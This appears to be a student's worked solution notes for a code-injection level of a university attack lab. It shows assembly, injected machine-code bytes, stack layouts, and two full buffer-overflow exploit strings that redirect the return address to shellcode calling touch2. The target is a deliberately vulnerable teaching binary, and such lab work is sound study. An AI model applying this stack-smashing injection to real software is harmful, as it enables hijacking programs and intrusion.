Make the injected code 
  - set your cookie on %rdi     -> movq $0x59b997fa,%rdi
  - transfer control to touch2  -> push $0x4017ec     
  -                             -> ret
  
#
  - run the injected code       -> gcc -c level2.s    // it produces level2.o
  - disassemble the object file -> objdump -d level2.o > level2.d  
  
  This is the code that we will inject in stack
  48 c7 c7 fa 97 b9 59
  68 ec 17 40 00 
  c3 

#
The input string should contains the address of your injected code.
we can put the injected code after 40 bytes at address 0x5561dca8

The stack will be like

00 00 00 c3 00 40 17 ec      |0x5561dcb0   
68 59 b9 97 fa c7 c7 48      |0x5561dca8
00 00 00 00 55 61 dc a8      |0x5561dca0
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00      | 0x5561dc78

The exploit string 

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
a8 dc 61 55 00 00 00 00
48 c7 c7 fa 97 b9 59 68 
ec 17 40 00 c3 00 00 00


#
or 
we can put it at the beginning of 40 bytes at address 0x5561dc78

The stack will be like

      |0x5561dca8
00 00 00 00 55 61 dc 78      |0x5561dca0
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 c3 00 40 17 ec       
68 59 b9 97 fa c7 c7 48     | 0x5561dc78

The exploit string 

48 c7 c7 fa 97 b9 59 68 
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00

#


 
  
 
